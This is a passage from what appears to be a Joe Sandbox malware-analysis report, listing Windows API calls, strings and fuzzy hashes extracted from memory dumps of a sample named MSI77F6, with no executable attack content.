                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                        • String ID:
                                        • API String ID: 4176008265-0
                                        • Opcode ID: 1f067efb1b8db8ffa92c86a8d18240e738ab971f9cee0658d4e01bb8b586f275
                                        • Instruction ID: a76cb626813c4f22042ad7d6ef57e29bcea251d784e6b1b45307e349f23325e5
                                        • Opcode Fuzzy Hash: 1f067efb1b8db8ffa92c86a8d18240e738ab971f9cee0658d4e01bb8b586f275
                                        • Instruction Fuzzy Hash: 8861ACB0900A89EFDF21CFA4C888BFE7BB9EB45358F184159E441A7251D779AD05CB20
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007D9AA5
                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007D9AA8
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007D9ACC
                                        • _memset.LIBCMT ref: 007D9ADD
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007D9AEF
                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007D9B67
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$LongWindow_memset
                                        • String ID:
                                        • API String ID: 830647256-0
                                        • Opcode ID: a09fd99f3c9a2f90daa5966640dc15b621b3e75ddfffa0a42fdf593bbfdc1c7b
                                        • Instruction ID: fb372f39d987f52b093c2c66ab92ac957df17574447f83515c6fcd6569ffe60c
                                        • Opcode Fuzzy Hash: a09fd99f3c9a2f90daa5966640dc15b621b3e75ddfffa0a42fdf593bbfdc1c7b
                                        • Instruction Fuzzy Hash: 0E616A71A00208AFDB21DFA4CC85EEE77B8EB49710F10456AFA18E7391D774AD41DBA4
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 007B3591
                                        • GetAsyncKeyState.USER32(000000A0), ref: 007B3612
                                        • GetKeyState.USER32(000000A0), ref: 007B362D
                                        • GetAsyncKeyState.USER32(000000A1), ref: 007B3647
                                        • GetKeyState.USER32(000000A1), ref: 007B365C
                                        • GetAsyncKeyState.USER32(00000011), ref: 007B3674
                                        • GetKeyState.USER32(00000011), ref: 007B3686
                                        • GetAsyncKeyState.USER32(00000012), ref: 007B369E
                                        • GetKeyState.USER32(00000012), ref: 007B36B0
                                        • GetAsyncKeyState.USER32(0000005B), ref: 007B36C8
                                        • GetKeyState.USER32(0000005B), ref: 007B36DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 7d969e521905c711a88b5747b60e13fd25da55619730d5f3568d06dab32a8bd5
                                        • Instruction ID: 597513ac94a017db629e5a9a925a9f7334b88ff24ce05583867ce2fecdb7bfbd
                                        • Opcode Fuzzy Hash: 7d969e521905c711a88b5747b60e13fd25da55619730d5f3568d06dab32a8bd5
                                        • Instruction Fuzzy Hash: 2A4181605087C97DFF319B6488143F5BFA16F11348F488059D9C6462C2EBAC9FD8CBA6
                                        APIs
                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 007AA2AA
                                        • SafeArrayAllocData.OLEAUT32(?), ref: 007AA2F5
                                        • VariantInit.OLEAUT32(?), ref: 007AA307
                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 007AA327
                                        • VariantCopy.OLEAUT32(?,?), ref: 007AA36A
                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 007AA37E
                                        • VariantClear.OLEAUT32(?), ref: 007AA393
                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 007AA3A0
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007AA3A9
                                        • VariantClear.OLEAUT32(?), ref: 007AA3BB
                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 007AA3C6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                        • String ID:
                                        • API String ID: 2706829360-0
                                        • Opcode ID: 603751e2736174689310a24324706cb680e455ae01b0283ca39b962f218b23d9
                                        • Instruction ID: d12ba0bf6944f914d9fa18935d05d1ffa0c2655e5f624cd8af7ca3f79e4ddaf5
                                        • Opcode Fuzzy Hash: 603751e2736174689310a24324706cb680e455ae01b0283ca39b962f218b23d9
                                        • Instruction Fuzzy Hash: 84412D31900219EFCF11EFA4D8889EEBBB9FF49354F108065F911A3251DB38AA45CBA5
                                        APIs
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • CoInitialize.OLE32 ref: 007CB298
                                        • CoUninitialize.COMBASE ref: 007CB2A3
                                        • CoCreateInstance.COMBASE(?,00000000,00000017,007FD8FC,?), ref: 007CB303
                                        • IIDFromString.COMBASE(?,?), ref: 007CB376
                                        • VariantInit.OLEAUT32(?), ref: 007CB410
                                        • VariantClear.OLEAUT32(?), ref: 007CB471
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 834269672-1287834457
                                        • Opcode ID: 6c807b4de5e6b8237b07f2021863042f1b0286bac8c949f6545b6a8939aaedb5
                                        • Instruction ID: 7fefcba633a5172b7c976cc5b465f8731783b2e050c51fe2e1e4f5c97fd84960
                                        • Opcode Fuzzy Hash: 6c807b4de5e6b8237b07f2021863042f1b0286bac8c949f6545b6a8939aaedb5
                                        • Instruction Fuzzy Hash: 4E617771208651AFC710DF64C88AF6AB7E8EF88754F00481DF9859B291D778EE48CB92
                                        APIs
                                        • WSAStartup.WS2_32(00000101,?), ref: 007C86F5
                                        • inet_addr.WS2_32(?), ref: 007C873A
                                        • gethostbyname.WS2_32(?), ref: 007C8746
                                        • IcmpCreateFile.IPHLPAPI ref: 007C8754
                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007C87C4
                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007C87DA
                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007C884F
                                        • WSACleanup.WS2_32 ref: 007C8855
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                        • String ID: Ping
                                        • API String ID: 1028309954-2246546115
                                        • Opcode ID: 911eac55659b6c04f34a3ee14852ced6251e68404fbf36eeadd7fc071e221d3b
                                        • Instruction ID: 21efb13f8ee2f87a7b41555302082cc2b638b20635f0f9a22c5dd3f259089978
                                        • Opcode Fuzzy Hash: 911eac55659b6c04f34a3ee14852ced6251e68404fbf36eeadd7fc071e221d3b
                                        • Instruction Fuzzy Hash: 47517131604201EFDB60EF64CC49F6A7BE5AF48720F14852EF5559B2A1DB78EC01CB52
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 007BEC1E
                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 007BEC94
                                        • GetLastError.KERNEL32 ref: 007BEC9E
                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 007BED0B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Error$Mode$DiskFreeLastSpace
                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                        • API String ID: 4194297153-14809454
                                        • Opcode ID: f1617de3795d917c88b7f93f5f03ebe54cbfcf3aaba5bc95541763d966667de0
                                        • Instruction ID: c42a8686b6b36847dd28f00c5a891ae122cfc2c2f2a36dd3b5014799585f78b4
                                        • Opcode Fuzzy Hash: f1617de3795d917c88b7f93f5f03ebe54cbfcf3aaba5bc95541763d966667de0
                                        • Instruction Fuzzy Hash: 6231A135A00209EFCB11EB64C949BEEBBB5FF44750F148025E505D7391DA7D9D81CBA1
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 007AC782
                                        • GetDlgCtrlID.USER32 ref: 007AC78D
                                        • GetParent.USER32 ref: 007AC7A9
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 007AC7AC
                                        • GetDlgCtrlID.USER32(?), ref: 007AC7B5
                                        • GetParent.USER32(?), ref: 007AC7D1
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 007AC7D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 313823418-1403004172
                                        • Opcode ID: f3b580f740c8bc758ede2ab1addccd0f97ec703e7d7aa02de7a4cad25e918a4d
                                        • Instruction ID: 75413d67dd6332bf759530dde3367e218f88b980f8715f0aa56dd7a1398df510
                                        • Opcode Fuzzy Hash: f3b580f740c8bc758ede2ab1addccd0f97ec703e7d7aa02de7a4cad25e918a4d
                                        • Instruction Fuzzy Hash: 7D219074900208FBDF06ABA4CC86EBEB775EB86350F108215F566D72D1DB7C5855EB20
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 007AC869
                                        • GetDlgCtrlID.USER32 ref: 007AC874
                                        • GetParent.USER32 ref: 007AC890
                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 007AC893
                                        • GetDlgCtrlID.USER32(?), ref: 007AC89C
                                        • GetParent.USER32(?), ref: 007AC8B8
                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 007AC8BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$CtrlParent$_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 313823418-1403004172
                                        • Opcode ID: ef2b2cf830e4944346efc6e2bccb0178373bca2065084d0e987e3513edc04c19
                                        • Instruction ID: ac6debc705ef8e9e57fb15f46878fbea7373b4fe7b4ec5a1b7af98aaa0586356
                                        • Opcode Fuzzy Hash: ef2b2cf830e4944346efc6e2bccb0178373bca2065084d0e987e3513edc04c19
                                        • Instruction Fuzzy Hash: A321A171900208FBDF01ABA4CC85EBEB775EF46341F108115F552E7191DB7C5855DB20
                                        APIs
                                        • GetParent.USER32 ref: 007AC8D9
                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 007AC8EE
                                        • _wcscmp.LIBCMT ref: 007AC900
                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 007AC97B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameParentSend_wcscmp
                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                        • API String ID: 1704125052-3381328864
                                        • Opcode ID: 3bae786027c5acc46b1efeeb70a9fd8c237d5be634860523c27b69d7389f60d6
                                        • Instruction ID: e6222f134e8a7cf1afffdf2c188271d6d3be1c34b24f6b5fe05f1219d69306c7
                                        • Opcode Fuzzy Hash: 3bae786027c5acc46b1efeeb70a9fd8c237d5be634860523c27b69d7389f60d6
                                        • Instruction Fuzzy Hash: 1911A3B7648313F9FE162A24AC0BCA767ADEB47760B200212F910E90D2FB6D79518554
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 007BB137
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ArraySafeVartype
                                        • String ID:
                                        • API String ID: 1725837607-0
                                        • Opcode ID: 17a69821e85f569c6dd00ec0c8e6cded891239a97ef6152c09807e06c8a84e33
                                        • Instruction ID: ceca9ec78f4b576dc60edbd8c49048f743269be6a95ca2274cf69e1692693f10
                                        • Opcode Fuzzy Hash: 17a69821e85f569c6dd00ec0c8e6cded891239a97ef6152c09807e06c8a84e33
                                        • Instruction Fuzzy Hash: 9CC14975A0021ADFDB04DF98D485BEEB7F4FF08325F20406AEA16E7251C7B9A941CB90
                                        APIs
                                        • __lock.LIBCMT ref: 0079BA74
                                          • Part of subcall function 00798984: __mtinitlocknum.LIBCMT ref: 00798996
                                          • Part of subcall function 00798984: RtlEnterCriticalSection.NTDLL(00790127), ref: 007989AF
                                        • __calloc_crt.LIBCMT ref: 0079BA85
                                          • Part of subcall function 00797616: __calloc_impl.LIBCMT ref: 00797625
                                          • Part of subcall function 00797616: Sleep.KERNEL32(00000000,?,00790127,?,0077125D,00000058,?,?), ref: 0079763C
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0079BAA0
                                        • GetStartupInfoW.KERNEL32(?,00826990,00000064,00796B14,008267D8,00000014), ref: 0079BAF9
                                        • __calloc_crt.LIBCMT ref: 0079BB44
                                        • GetFileType.KERNEL32(00000001), ref: 0079BB8B
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0079BBC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                        • String ID:
                                        • API String ID: 1426640281-0
                                        • Opcode ID: 5279e79f1e3b6fa51c55e37f286edd6ac813fe12ba1254f152ea6bdca39f4794
                                        • Instruction ID: 5fd3d2a22aa62e55dbd6824df419c197ec8b765471b3d31534f023523e2983e2
                                        • Opcode Fuzzy Hash: 5279e79f1e3b6fa51c55e37f286edd6ac813fe12ba1254f152ea6bdca39f4794
                                        • Instruction Fuzzy Hash: 2C81D470905745CFCF14CF68F9846A9BBB0BF4A324B24865DD466AB3D1D7389802CB64
                                        APIs
                                        • __swprintf.LIBCMT ref: 007B7226
                                        • __swprintf.LIBCMT ref: 007B7233
                                          • Part of subcall function 0079234B: __woutput_l.LIBCMT ref: 007923A4
                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 007B725D
                                        • LoadResource.KERNEL32(?,00000000), ref: 007B7269
                                        • LockResource.KERNEL32(00000000), ref: 007B7276
                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 007B7296
                                        • LoadResource.KERNEL32(?,00000000), ref: 007B72A8
                                        • SizeofResource.KERNEL32(?,00000000), ref: 007B72B7
                                        • LockResource.KERNEL32(?), ref: 007B72C3
                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 007B7322
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                        • String ID:
                                        • API String ID: 1433390588-0
                                        • Opcode ID: 2c6ff5ab7eebd5c51f1b3f0bbb3a6bb06703ed09eec5100cfde812dde67a2bba
                                        • Instruction ID: b5e78b9f8508344097f74aa2a1b108b3fcb310a4502d7543b73b222b13fd5b72
                                        • Opcode Fuzzy Hash: 2c6ff5ab7eebd5c51f1b3f0bbb3a6bb06703ed09eec5100cfde812dde67a2bba
                                        • Instruction Fuzzy Hash: B831ABB190425AABDF159F60AC89BFF7BA9FF88301F008425F902E2151E738D950DAA4
                                        APIs
                                        • GetClientRect.USER32(?), ref: 007EEC32
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 007EEC49
                                        • GetWindowDC.USER32(?), ref: 007EEC55
                                        • GetPixel.GDI32(00000000,?,?), ref: 007EEC64
                                        • ReleaseDC.USER32(?,00000000), ref: 007EEC76
                                        • GetSysColor.USER32(00000005), ref: 007EEC94
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                        • String ID:
                                        • API String ID: 272304278-0
                                        • Opcode ID: bea27a41d84c9a5867a97079a418b45828d2f81b5c8acc39eb63be22e7633899
                                        • Instruction ID: 4a3a0dea506f3bedb192e2b1435f7b711529c809279b1b749cda56fdd976492c
                                        • Opcode Fuzzy Hash: bea27a41d84c9a5867a97079a418b45828d2f81b5c8acc39eb63be22e7633899
                                        • Instruction Fuzzy Hash: 50215E31540645EFDB21AB64EC48BB97B76EB09321F208520FA26A50F1DB390D51DF21
                                        APIs
                                        • EnumChildWindows.USER32(?,007ADD46), ref: 007ADC86
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                         • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmp
